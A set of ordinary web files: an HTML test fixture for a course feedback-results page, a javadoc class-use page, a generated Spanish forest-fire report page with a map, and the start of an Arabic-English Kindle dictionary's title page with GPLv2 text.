<a href="/page/instructorFeedbackEditPage?courseid=AHPUiT____.instr1_.gma-demo&fsname=Second+team+feedback+session&user=${test.instructor}">
[Edit]
</a>
</p>
</div>
</div>
</div>
<div class="col-sm-7 col-lg-6">
<div class="form-group">
<label class="col-lg-4 control-label">
Session duration:
</label>
<div class="col-lg-8">
<p class="form-control-static">
Sun, 01 Apr 2012, 11:59 PM
<b>
to
</b>
Thu, 02 Apr 2037, 11:59 PM
</p>
</div>
</div>
<div class="form-group">
<label class="col-lg-4 control-label">
Results visible from:
</label>
<div class="col-lg-8">
<p class="form-control-static">
Tue, 01 May 2012, 11:59 PM
</p>
</div>
</div>
</div>
<div class="col-sm-4 col-lg-2">
<div class="form-group">
<div class="col-md-12">
<form action="/page/instructorFeedbackResultsDownload" method="post">
<div id="feedbackDataButtons">
<input class="btn btn-primary btn-block" id="button_download" name="fruploaddownloadbtn" type="submit" value="Download Results">
</div>
<input name="user" type="hidden" value="${test.instructor}">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="sectionname" type="hidden" value="All">
<input id="filterTextForDownload" name="filtertext" type="hidden">
<input id="statsShownCheckBox" name="frshowstats" type="hidden" value="true">
<input name="frindicatemissingresponses" type="hidden" value="true">
</form>
<br>
<div>
<a class="btn btn-primary btn-block btn-tm-actions session-unpublish-for-test" data-fsname="Second team feedback session" data-original-title="Make responses no longer visible" data-placement="top" data-sending-published-email="true" data-toggle="tooltip" href="/page/instructorFeedbackUnpublish?courseid=AHPUiT____.instr1_.gma-demo&fsname=Second+team+feedback+session&next=%2Fpage%2FinstructorFeedbacksPage&user=${test.instructor}&token=${sessionToken}" title="">
Unpublish Results
</a>
</div>
<br>
<div>
<button class="btn btn-primary btn-block" id="button-print" type="input">
Print View
</button>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<span class="help-block align-center">
Non-English characters not displayed properly in the downloaded file?
<span class="btn-link" data-target="#fsResultsTableWindow" data-toggle="modal" onclick="submitFormAjax()">
click here
</span>
</span>
</div>
</div>
</div>
</div>
<form id="csvToHtmlForm">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="user" type="hidden" value="${test.instructor}">
<input name="frgroupbysection" type="hidden" value="All">
<input name="csvtohtmltable" type="hidden" value="true">
</form>
<div class="modal fade align-center" id="fsResultsTableWindow">
<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-header">
<span class="help-block" style="display:inline;">
Tips: After selecting the table,
<kbd>
Ctrl + C
</kbd>
to COPY and
<kbd>
Ctrl + V
</kbd>
to PASTE to your Excel Workbook.
</span>
<button class="btn btn-default" data-dismiss="modal" type="button">
Close
</button>
<button class="btn btn-primary" onclick="selectElementContents(document.getElementById('fsModalTable'));" type="button">
Select Table
</button>
</div>
<div class="modal-body">
<div class="table-responsive">
<div id="fsModalTable">
</div>
<br>
<div id="ajaxStatus">
</div>
</div>
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<br>
<div id="statusMessagesToUser" style="display: none;">
</div>
<br>
<div class="bold color_red align-center">
There are no responses for this feedback session yet or you do not have access to the responses collected so far.
</div>
<br>
<div class="panel panel-info">
<div class="panel-heading ajax_auto" data-target="#panelBodyCollapse-1" id="panelHeading-1" style="cursor: pointer;">
<form action="/page/instructorFeedbackResultsPage" class="seeMoreForm-1" id="seeMore-1" style="display:none;">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="user" type="hidden" value="${test.instructor}">
<input name="frgroupbyteam" type="hidden" value="on">
<input name="frsorttype" type="hidden" value="question">
<input id="showStats-1" name="frshowstats" type="hidden" value="on">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="frgroupbysection" type="hidden" value="All">
</form>
<div class="display-icon pull-right">
<span class="glyphicon glyphicon-chevron-up pull-right">
</span>
</div>
<form action="/page/instructorFeedbackResultsDownload" class="inline" method="post">
<div class="inline" id="DownloadQuestion-1">
<input class="btn-link text-bold padding-0 color-inherit" data-original-title="Download Question Results" data-toggle="tooltip" id="button_download-1" name="fruploaddownloadbtn" title="" type="submit" value="Question 1:">
</div>
<input name="user" type="hidden" value="${test.instructor}">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="sectionname" type="hidden" value="All">
<input id="filterTextForDownload" name="filtertext" type="hidden">
<input id="statsShownCheckBox" name="frshowstats" type="hidden" value="">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="questionnum" type="hidden" value="1">
</form>
<div class="inline panel-heading-text">
<span class="text-preserve-space">
Please rate the estimated contribution of your team members and yourself.
<span style=" white-space: normal;">
<a class="color_gray" data-less="[less]" data-more="[more]" href="javascript:;" id="questionAdditionalInfoButton-1-" onclick="toggleAdditionalQuestionInfo('1-')">
[more]
</a>
<br>
<span id="questionAdditionalInfo-1-" style="display:none;">
Team contribution question
</span>
</span>
</span>
</div>
</div>
<div class="panel-collapse collapse" id="panelBodyCollapse-1">
<div class="panel-body padding-0" id="questionBody-0">
<div class="col-sm-12 no-response">
<i class="text-muted">
There are no responses for this question or you may not have the permission to see the response
</i>
</div>
</div>
</div>
</div>
<div class="panel panel-info">
<div class="panel-heading ajax_auto" data-target="#panelBodyCollapse-2" id="panelHeading-2" style="cursor: pointer;">
<form action="/page/instructorFeedbackResultsPage" class="seeMoreForm-2" id="seeMore-2" style="display:none;">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="user" type="hidden" value="${test.instructor}">
<input name="frgroupbyteam" type="hidden" value="on">
<input name="frsorttype" type="hidden" value="question">
<input id="showStats-2" name="frshowstats" type="hidden" value="on">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="frgroupbysection" type="hidden" value="All">
</form>
<div class="display-icon pull-right">
<span class="glyphicon glyphicon-chevron-up pull-right">
</span>
</div>
<form action="/page/instructorFeedbackResultsDownload" class="inline" method="post">
<div class="inline" id="DownloadQuestion-2">
<input class="btn-link text-bold padding-0 color-inherit" data-original-title="Download Question Results" data-toggle="tooltip" id="button_download-2" name="fruploaddownloadbtn" title="" type="submit" value="Question 2:">
</div>
<input name="user" type="hidden" value="${test.instructor}">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="sectionname" type="hidden" value="All">
<input id="filterTextForDownload" name="filtertext" type="hidden">
<input id="statsShownCheckBox" name="frshowstats" type="hidden" value="">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="questionnum" type="hidden" value="2">
</form>
<div class="inline panel-heading-text">
<span class="text-preserve-space">
Comments about my contribution (shown to other teammates)
</span>
</div>
</div>
<div class="panel-collapse collapse" id="panelBodyCollapse-2">
<div class="panel-body padding-0" id="questionBody-1">
<div class="col-sm-12 no-response">
<i class="text-muted">
There are no responses for this question or you may not have the permission to see the response
</i>
</div>
</div>
</div>
</div>
<div class="panel panel-info">
<div class="panel-heading ajax_auto" data-target="#panelBodyCollapse-3" id="panelHeading-3" style="cursor: pointer;">
<form action="/page/instructorFeedbackResultsPage" class="seeMoreForm-3" id="seeMore-3" style="display:none;">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="user" type="hidden" value="${test.instructor}">
<input name="frgroupbyteam" type="hidden" value="on">
<input name="frsorttype" type="hidden" value="question">
<input id="showStats-3" name="frshowstats" type="hidden" value="on">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="frgroupbysection" type="hidden" value="All">
</form>
<div class="display-icon pull-right">
<span class="glyphicon glyphicon-chevron-up pull-right">
</span>
</div>
<form action="/page/instructorFeedbackResultsDownload" class="inline" method="post">
<div class="inline" id="DownloadQuestion-3">
<input class="btn-link text-bold padding-0 color-inherit" data-original-title="Download Question Results" data-toggle="tooltip" id="button_download-3" name="fruploaddownloadbtn" title="" type="submit" value="Question 3:">
</div>
<input name="user" type="hidden" value="${test.instructor}">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="sectionname" type="hidden" value="All">
<input id="filterTextForDownload" name="filtertext" type="hidden">
<input id="statsShownCheckBox" name="frshowstats" type="hidden" value="">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="questionnum" type="hidden" value="3">
</form>
<div class="inline panel-heading-text">
<span class="text-preserve-space">
My comments about this teammate(confidential and only shown to instructor)
</span>
</div>
</div>
<div class="panel-collapse collapse" id="panelBodyCollapse-3">
<div class="panel-body padding-0" id="questionBody-2">
<div class="col-sm-12 no-response">
<i class="text-muted">
There are no responses for this question or you may not have the permission to see the response
</i>
</div>
</div>
</div>
</div>
<div class="panel panel-info">
<div class="panel-heading ajax_auto" data-target="#panelBodyCollapse-4" id="panelHeading-4" style="cursor: pointer;">
<form action="/page/instructorFeedbackResultsPage" class="seeMoreForm-4" id="seeMore-4" style="display:none;">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="user" type="hidden" value="${test.instructor}">
<input name="frgroupbyteam" type="hidden" value="on">
<input name="frsorttype" type="hidden" value="question">
<input id="showStats-4" name="frshowstats" type="hidden" value="on">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="frgroupbysection" type="hidden" value="All">
</form>
<div class="display-icon pull-right">
<span class="glyphicon glyphicon-chevron-up pull-right">
</span>
</div>
<form action="/page/instructorFeedbackResultsDownload" class="inline" method="post">
<div class="inline" id="DownloadQuestion-4">
<input class="btn-link text-bold padding-0 color-inherit" data-original-title="Download Question Results" data-toggle="tooltip" id="button_download-4" name="fruploaddownloadbtn" title="" type="submit" value="Question 4:">
</div>
<input name="user" type="hidden" value="${test.instructor}">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="sectionname" type="hidden" value="All">
<input id="filterTextForDownload" name="filtertext" type="hidden">
<input id="statsShownCheckBox" name="frshowstats" type="hidden" value="">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="questionnum" type="hidden" value="4">
</form>
<div class="inline panel-heading-text">
<span class="text-preserve-space">
Comments about team dynamics(confidential and only shown to instructor)
</span>
</div>
</div>
<div class="panel-collapse collapse" id="panelBodyCollapse-4">
<div class="panel-body padding-0" id="questionBody-3">
<div class="col-sm-12 no-response">
<i class="text-muted">
There are no responses for this question or you may not have the permission to see the response
</i>
</div>
</div>
</div>
</div>
<div class="panel panel-info">
<div class="panel-heading ajax_auto" data-target="#panelBodyCollapse-5" id="panelHeading-5" style="cursor: pointer;">
<form action="/page/instructorFeedbackResultsPage" class="seeMoreForm-5" id="seeMore-5" style="display:none;">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="user" type="hidden" value="${test.instructor}">
<input name="frgroupbyteam" type="hidden" value="on">
<input name="frsorttype" type="hidden" value="question">
<input id="showStats-5" name="frshowstats" type="hidden" value="on">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="frgroupbysection" type="hidden" value="All">
</form>
<div class="display-icon pull-right">
<span class="glyphicon glyphicon-chevron-up pull-right">
</span>
</div>
<form action="/page/instructorFeedbackResultsDownload" class="inline" method="post">
<div class="inline" id="DownloadQuestion-5">
<input class="btn-link text-bold padding-0 color-inherit" data-original-title="Download Question Results" data-toggle="tooltip" id="button_download-5" name="fruploaddownloadbtn" title="" type="submit" value="Question 5:">
</div>
<input name="user" type="hidden" value="${test.instructor}">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="sectionname" type="hidden" value="All">
<input id="filterTextForDownload" name="filtertext" type="hidden">
<input id="statsShownCheckBox" name="frshowstats" type="hidden" value="">
<input name="frindicatemissingresponses" type="hidden" value="true">
<input name="questionid" type="hidden" value="${question.id}">
<input name="questionnum" type="hidden" value="5">
</form>
<div class="inline panel-heading-text">
<span class="text-preserve-space">
My feedback to this teammate(shown anonymously to the teammate)
</span>
</div>
</div>
<div class="panel-collapse collapse" id="panelBodyCollapse-5">
<div class="panel-body padding-0" id="questionBody-4">
<div class="col-sm-12 no-response">
<i class="text-muted">
There are no responses for this question or you may not have the permission to see the response
</i>
</div>
</div>
</div>
</div>
<div class="panel panel-default">
<div class="panel-heading ajax-response-auto" data-target="#panelBodyCollapse-6" id="panelHeading-6" style="cursor: pointer;">
<form action="/page/instructorFeedbackResultsPage" class="responseRateForm" id="responseRate" style="display:none;">
<input name="courseid" type="hidden" value="AHPUiT____.instr1_.gma-demo">
<input name="fsname" type="hidden" value="Second team feedback session">
<input name="user" type="hidden" value="${test.instructor}">
<input name="questionid" type="hidden" value="-1">
</form>
<div class="display-icon pull-right">
<span class="glyphicon glyphicon-chevron-down pull-right">
</span>
</div>
Participants who have not responded to any question
</div>
<div class="panel-collapse collapse" id="panelBodyCollapse-6">
</div>
</div>
</div>
|
ClientWorkspace/EPClaim/doc/JSHOP2/class-use/CompMore.html | mua22/PLACE | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_79) on Wed Nov 18 04:55:16 PKT 2015 -->
<title>Uses of Class JSHOP2.CompMore</title>
<meta name="date" content="2015-11-18">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class JSHOP2.CompMore";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../JSHOP2/CompMore.html" title="class in JSHOP2">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?JSHOP2/class-use/CompMore.html" target="_top">Frames</a></li>
<li><a href="CompMore.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class JSHOP2.CompMore" class="title">Uses of Class<br>JSHOP2.CompMore</h2>
</div>
<div class="classUseContainer">No usage of JSHOP2.CompMore</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../JSHOP2/CompMore.html" title="class in JSHOP2">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?JSHOP2/class-use/CompMore.html" target="_top">Frames</a></li>
<li><a href="CompMore.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
build/2003210176/index.html | flowsta/mi-news-app | <!doctype html>
<html lang="es">
<head>
<title>Incendio en CALAÑAS en ANDALUCIA</title>
<link rel="stylesheet" href="../css/main.css" type="text/css" media="screen" />
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.2/leaflet.css" />
<script type="text/javascript" src="http://cdn.leafletjs.com/leaflet-0.7.2/leaflet.js?2"></script>
</head>
<body>
<div id="map" style="width:100%; height:400px;"></div>
<h1>Incendio en CALAÑAS (ANDALUCIA)</h1>
<p>El incendio que afectó al municipio de CALAÑAS quemó una superficie forestal de 594.5800} de la comarca de EL ANDEVALO de la provincia de HUELVA (ANDALUCIA).</p>
<p>Se inició en 2003-08-12, se controló en 1135 y se extinguió en 1675.</p>
<p>La causa del incendio fue FUMADORES. En la extinción del incendio participaron 253 personas, 14 vehiculos pesados y 17 medios aereos. Hubo 0 muertos y 1 heridos.</p>
<script type="text/javascript">
var map = L.map('map').setView([37.61282300, -6.85986500], 8);
var mapquestLayer = new L.TileLayer('http://{s}.mqcdn.com/tiles/1.0.0/map/{z}/{x}/{y}.png', {
maxZoom: 18,
attribution: 'Data, imagery and map information provided by <a href="http://open.mapquest.co.uk" target="_blank">MapQuest</a>,<a href="http://www.openstreetmap.org/" target="_blank">OpenStreetMap</a> and contributors.',
subdomains: ['otile1','otile2','otile3','otile4']
});
map.addLayer(mapquestLayer);
var marker = L.marker([37.61282300, -6.85986500]).addTo(map);
</script>
</body>
</html> |
datafiles/title-page.html | runehol/kindlearadict | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>The Morphological Arabic-English Dictionary</title>
</head>
<body>
<h1>The Morphological Arabic-English Dictionary</h1>
<br/>
<p>This is an Arabic-English dictionary for use as a Kindle default dictionary. The dictionary is licensed under GPLv2.0, and source can be found at <a href="https://github.com/runehol/kindlearadict">https://github.com/runehol/kindlearadict</a> </p>
<br/>
<h3>Credits:</h3>
<ul>
<li>Rune Holm: Main author and Kindle dictionary generation <a href="https://github.com/runehol/kindlearadict">https://github.com/runehol/kindlearadict</a></li>
<li>Incorporates data from Tim Buckwalter's Buckwalter Arabic Morphological Analyzer Version 1.0. <a href="https://catalog.ldc.upenn.edu/LDC2002L49">https://catalog.ldc.upenn.edu/LDC2002L49</a></li>
<li>Incorporates code and data from Michelle Fullwood's Fuzzy Arabic Dictionary <a href="http://fuzzyarabic.herokuapp.com/">http://fuzzyarabic.herokuapp.com/</a></li>
<li>Incorporates code from Alex Lee's pyaramorph Python port of the Buckwalter analyzer <a href="http://home.uchicago.edu/~alexlee/pyaramorph/">http://home.uchicago.edu/~alexlee/pyaramorph/</a></li>
</ul>
<br/>
<hr/>
<br/>
<h3><a id="SEC1">GNU GENERAL PUBLIC LICENSE</a></h3>
<p>
Version 2, June 1991
</p>
<pre>
Copyright (C) 1989, 1991 Free Software Foundation, Inc.
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
</pre>
<h3><a id="preamble"></a><a id="SEC2">Preamble</a></h3>
<p>
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
</p>
<p>
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
</p>
<p>
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
</p>
<p>
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
</p>
<p>
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
</p>
<p>
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
</p>
<p>
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
</p>
<p>
The precise terms and conditions for copying, distribution and
modification follow.
</p>
<h3><a id="terms"></a><a id="SEC3">TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION</a></h3>
<a id="section0"></a><p>
<strong>0.</strong>
This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
</p>
<p>
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
</p>
<a id="section1"></a><p>
<strong>1.</strong>
You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
</p>
<p>
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
</p>
<a id="section2"></a><p>
<strong>2.</strong>
You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
</p>
<dl>
<dt></dt>
<dd>
<strong>a)</strong>
You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
</dd>
<dt></dt>
<dd>
<strong>b)</strong>
You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
</dd>
<dt></dt>
<dd>
<strong>c)</strong>
If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
</dd>
</dl>
<p>
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
</p>
<p>
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
</p>
<p>
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
</p>
<a id="section3"></a><p>
<strong>3.</strong>
You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
</p>
<!-- we use this doubled UL to get the sub-sections indented, -->
<!-- while making the bullets as unobvious as possible. -->
<dl>
<dt></dt>
<dd>
<strong>a)</strong>
Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
</dd>
<dt></dt>
<dd>
<strong>b)</strong>
Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
</dd>
<dt></dt>
<dd>
<strong>c)</strong>
Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
</dd>
</dl>
<p>
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
</p>
<p>
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
</p>
<a id="section4"></a><p>
<strong>4.</strong>
You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
</p>
<a id="section5"></a><p>
<strong>5.</strong>
You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
</p>
<a id="section6"></a><p>
<strong>6.</strong>
Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
</p>
<a id="section7"></a><p>
<strong>7.</strong>
If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
</p>
<p>
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
</p>
<p>
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
</p>
<p>
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
</p>
<a id="section8"></a><p>
<strong>8.</strong>
If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
</p>
<a id="section9"></a><p>
<strong>9.</strong>
The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
</p>
<p>
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
</p>
<a id="section10"></a><p>
<strong>10.</strong>
If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
</p>
<a id="section11"></a><p><strong>NO WARRANTY</strong></p>
<p>
<strong>11.</strong>
BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
